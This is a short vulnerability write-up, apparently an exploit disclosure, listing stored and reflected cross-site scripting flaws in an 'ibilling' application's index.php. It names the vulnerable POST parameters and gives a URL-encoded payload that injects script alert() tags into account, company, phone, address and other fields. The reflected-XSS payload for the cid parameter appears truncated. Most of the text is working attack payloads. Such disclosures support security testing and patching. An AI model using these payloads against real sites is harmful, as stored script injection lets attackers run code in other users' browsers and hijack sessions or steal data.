1. Cross Site Scripting (Stored): http://localhost/ibilling/index.php Parameters: msg, desc, account, phone, company, address, city, state, zip, tags, description, ref (POST) Payload(s): account=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&company=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&email=test%40yahoo.com&phone=%22%3E%3Cscript%3Ealert(4)%3C%2Fscript%3E&address=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&city=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&state=%22%3E%3Cscript%3Ealert(7)%3C%2Fscript%3E&zip=%22%3E%3Cscript%3Ealert(8)%3C%2Fscript%3E&country=TR&tags%5B%5D=web_development%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 2. Cross Site Scripting (Reflected): http://localhost/ibilling/index.php Parameters: cid (POST) Payload(s): cid=1001">&msg=&icon= +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++